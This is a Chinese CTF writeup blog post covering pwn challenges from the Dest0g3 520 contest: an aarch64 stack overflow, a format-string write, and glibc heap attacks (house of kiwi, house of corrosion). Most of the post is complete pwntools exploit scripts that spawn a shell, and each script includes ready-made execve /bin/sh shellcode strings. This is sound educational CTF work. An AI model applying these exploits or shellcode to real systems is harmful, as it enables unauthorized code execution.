---
title: Dest0g3_520迎新赛 Writeup
date: 2022-07-11 17:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=33/
pin: false
published:
---

整理了一下，高版本IO入门的一场比赛

## ez_aarch(aarch64)

![image-20220521214823484](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220521214823484.png)

![image-20220521214918961](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220521214918961.png)

![image-20220521214932381](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220521214932381.png)

题目有后门函数，直接栈溢出覆盖ret

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='aarch64', os='linux')
context.log_level = 'debug'
p=remote("node4.buuoj.cn","26246")
# p = process("qemu-aarch64 -L /usr/aarch64-linux-gnu/ ./stack".split())
# p = process("qemu-aarch64 -L /usr/aarch64-linux-gnu/ -g 1236 ./stack".split())
elf = ELF("./stack")
# libc = elf.libc

def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
system = 0x400000093c

sla("Please leave your name:",'a'*0x28+p64(system))
p.interactive()
```

## dest_love

![image-20220711182331514](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220711182331514.png)

一个循环的bss段上字符串，存在后门

![image-20220711182438689](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220711182438689.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'

p = process("./pwn")
# p=remote("node4.buuoj.cn","28979")
elf = ELF("./pwn")
# libc = elf.libc

def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
shell = 1314520
tag = 0x4010 

sla("What about your love to Dest0g3?",'%10$p%12$p')
p.recvuntil("0x")
stack = int(p.recv(12),16)
lg('stack',stack)

p.recvuntil("0x")
base = int(p.recv(12),16)-0x1185
lg('base',base)
tag = base+tag
lg('tag',tag)

stack2 = stack-0xd8
pay = '%{}c%{}$hnxxxx'.format(stack2&0xffff,10)

sla("What about your love to Dest0g3?",pay)

pay = '%{}c%{}$hnxxxx'.format(tag&0xffff,39)
ru('xxx')
sla("What about your love to Dest0g3?",pay)

pay = '%{}c%{}$hnxxxx'.format(shell&0xffff,12)
# ru('xxx')
sla("What about your love to Dest0g3?",pay)

pay = '%{}c%{}$hnxxxx'.format((tag+2)&0xffff,39)
# ru('xxx')
sla("What about your love to Dest0g3?",pay)
shellh = shell>>16
pay = '%{}c%{}$hhnxxxx'.format(shellh&0xff,12)
# ru('xxx')
sla("What about your love to Dest0g3?",pay)
# dbg()

# pay = '%{}c%{}$hhn'.format(shellh&0xff,13)

# sla("What about your love to Dest0g3?",pay)
p.interactive()
```

## emma

[(https://blog.e4l4.com/posts/IO利用总结/#emmabss段stderr233uaf](https://blog.e4l4.com/posts/IO利用总结/#emmabss段stderr233uaf)

## ez_kiwi

![image-20220712144137201](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220712144137201.png)

题目在菜单部分有一个clear函数，清除了malloc_hook/free_hook/__after_morecore_hook

![image-20220712144501595](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220712144501595.png)

也就是模拟了一个libc2.34的环境

漏洞点在，edit时存在一个offbyone，最大size为0x100

![image-20220712144922112](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220712144922112.png)

这里向下合并能造堆复用，任意地址申请了，就可以考虑house of kiwi，这里也体现了house of kiwi的特点，就2个任意地址写就能利用，也不用伪造整个结构体

这里不把sync改成OGG的原因主要是满足不了OGG的条件，寄存器环境比较复杂

这里也可以把sync改成system，然后写IO_stdderr为/bin/sh

改成setcontext可以有2个执行点，可以执行rop链

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux')
# context.log_level = 'debug'
# p=remote("node4.buuoj.cn","26246")
p = process("./ez_kiwi")

elf = ELF("./ez_kiwi")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size,idx,con='a'):
    sla('>> ',1)
    sla("How much do you want?",size)
    sla("Which one do you want to put?",idx)
    p.sendafter('Tell me your idea:',con)

def dele(idx):
    sla('>> ',2)
    sla("Which one do you want to remove?",idx)

def edit(idx,con):
    sla('>> ',4)
    sla("Which one do you want to change?",idx)
    p.sendlineafter("Change your idea:",con)

def show(idx):
    sla('>> ',3)
    sla("Which one do you want to look?",idx)


note = 0x40C0
libc_base = 0x4110
sla("Before the game starts, please give me your name:","e4l4")


for i in range(7):
    add(0xe8,i)
for i in range(7):
    dele(i)


add(0x48,0)
add(0x78,1)
add(0x38,2)
add(0x28,3)

add(0x78,4)


dele(3)
edit(0,'a'*0x48+'\xf1')
dele(1)


add(0x78,5)
show(2)
libc_base = uu64()-0x1ebbe0
lg('libc_base')
free_hook = libc_base+libc.sym['__free_hook']
setcontext = libc_base+libc.sym['setcontext'] + 61
IO_helper_jumps = libc_base + 0x1ec8a0
IO_file_jumps = 0x1ed4a0+libc_base
system = libc_base+libc.sym['system']
one = libc_base + 0xe6c84
ret = libc_base + 0x0000000000025679
pop_r15 = 0x0000000000026b71+libc_base
sh = libc_base+libc.search('/bin/sh\x00').next()
pop_rdi = 0x0000000000026b72+libc_base
pop_rsi = 0x0000000000027529+libc_base


lg('ret')
lg('IO_helper_jumps')
add(0x68,6)

add(0x68,7)
dele(7)

dele(2)
show(6)
p.recvuntil("content: ")
heap_base = u64(p.recv(6).ljust(8,'\x00'))-0xb20
lg('heap_base')
edit(6,p64(IO_file_jumps+0x60))
add(0x68,2)
add(0x68,8,p64(setcontext))

add(0x68,7)
dele(7)

dele(2)
edit(6,p64(IO_helper_jumps+0xa0))
add(0x68,2)
add(0x68,9,p64(heap_base+0xa30)+p64(ret))

add(0x68,7)
dele(7)

dele(2)
edit(6,p64(heap_base+0xc60))
add(0x68,2,p64(pop_rdi)+p64(sh)+p64(system))
add(0x68,7,p64(0)*5)


sla('>> ',1)
sla("How much do you want?",0x100)
sla("Which one do you want to put?",1)

p.interactive()
```



## dest0g3_heap

![image-20220714192957706](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220714192957706.png)

程序开头mmap了一片0x3000

![image-20220714193248801](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220714193248801.png)

申请calloc申请，没有size限制，最新的chunk记录在ptr里，show则可以show出ptr里的值

edit可以输入编辑的大小(<0x1000)和内容，以及输入的位置于mmp的偏移(0x2000)，dele可以free掉基于mmp的偏移地址(0x3000)

![image-20220714214917534](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220714214917534.png)

![image-20220714214846816](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220714214846816.png)

calloc绕过tcache申请，并且四个功能编辑的地方不同，得想办法串联起来，要把mmp区域转换为堆块地址。四个功能串联以后，发现存在UAF漏洞

泄露libc以及mmp地址这里不再赘述，这道题主要的利用思路是house of corrosion+house of kiwi

house of corrosion 可以实现任意地址写任意值，算是largebinattack的上位，主要利用手法：

前置条件是劫持global_max_fast为大值

1.计算目标位置偏移size，申请相应size的堆(也可以直接伪造)

2.free掉堆块(此时目标位置会写入该堆块的地址)，编辑堆块的fd指针为要写入的值

3.申请回堆块实现攻击

也可以任意地址写入堆块地址，所以是largebinattack的上位

这里利用的是Kiwi的方案一，sync为system，stderr为/bin/sh，这里还需要去把stderr的vtable换成IO_helper_jumps，因为原本的IO_file_jumps距离fastbinY为0x19xx，在\*2堆块size大于我们可编辑的上限，难以伪造，而IO_helper_jumps距离更近，\*2以后size也只有0x16xx。

最后触发的位置，main_arena+96记录了topchunk的地址，利用house of corrosion在该位置写入堆块位置，实现topchunksize的修改

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux')
# context.log_level = 'debug'
p = process("./pwn")

elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size):
    sla(">> ",1)
    sla("size: ",size)

def edit(offset,con):# 0x1000 0x2000
    sla(">> ",2)
    sla("size: ",len(con))
    sla("offset: ",offset)
    p.sendafter("content: ",con)

def show():
    sla(">> ",4)

def dele(idx):# 0x3000
    sla(">> ",3)
    sla("idx: ",idx)

#--------------------leak libc----------------------------
ptr = 0x4058

add(0x300)

pay= p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x431)
pay+=(p64(0)+p64(0x21))*0x42
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
edit(0,pay)

dele(0x30)# 0x430
add(0x420)# get mmpchunk
dele(0x30)# into unsortbin
edit(0x30,'a')
show()
libc_base = uu64()-96-libc.sym['__malloc_hook']-0x10-0x61
lg('libc_base')

IO_2_1_stderr= libc_base + 0x1e15e0 
system = libc_base+libc.sym["system"]
global_max_fast = libc_base+0x1e3e78
IO_helper_jumps = libc_base+0x1e1960
edit(0x30,'\x00')# recover
#--------------------leak mmp-----------------------------
pay =p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x421)
pay+=(p64(0)+p64(0x21))*0x41
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)

edit(0x800,pay)
dele(0x830)# 0x420

edit(0x30,'a'*8)# into unsortbin
show()
p.recvuntil('a'*8)
mmp = u64(p.recv(5).ljust(8,'\x00'))-0x820
lg('mmp')

edit(0x30,p64(libc_base+0x1e0c00))# main_arena+96
add(0x410)# add +0x830/ +0x30 into largebin

#--------------- attack fastbin global-----------------------
pay= p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x421)
pay+=(p64(0)+p64(0x21))*0x41
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
edit(0x1200,pay)
dele(0x1230)# 0x420

edit(0x30,p64(libc_base+0x1e0ff0)*2+p64(0)+p64(global_max_fast-0x20-3))# 
add(0x500)
#----------------attack stderr_vtabe---------------------------
# p &main_arena.fastbinsY
key2 = (mmp+0x1030)>>12

pay= p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x1631)# stderr_vtabe
edit(0x1000,pay)
pay= '\x00'*0x651
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
edit(0x1fff,pay)# max offset

dele(0x1030)# 0x1630 stderr_vtabe will get +0x1030
edit(0x1030,p64(key2^(IO_helper_jumps)))

add(0x1620)
#-----------------attack sync---------------------------------
pay= p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x1c41)# sync
edit(0x1000,pay)
pay='\x00'*0xc61
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
edit(0x1fff,pay)

dele(0x1030)
edit(0x1030,p64(key2^system))
add(0x1c30)
#-----------------attack IO_stdderr-----------------------------

pay= p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x1481)# IO_stdderr
edit(0x1000,pay)
pay='\x00'*0x4a1
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
edit(0x1fff,pay)
dele(0x1030)

edit(0x1030,p64(key2^0x0068732f6e69622f))# /bin/sh
add(0x1470)
#-----------------attack topchunk-----------------------------

pay= p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0xc1)# topchunk
pay+=p64(0)*22
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
pay+=p64(0)+p64(0x21)
edit(0x1800,pay)

for i in range(7):
    dele(0x1830)
    edit(0x1830,'\x00'*0x10)

dele(0x1830)
add(0xffff)
# dbg()
p.interactive()
```

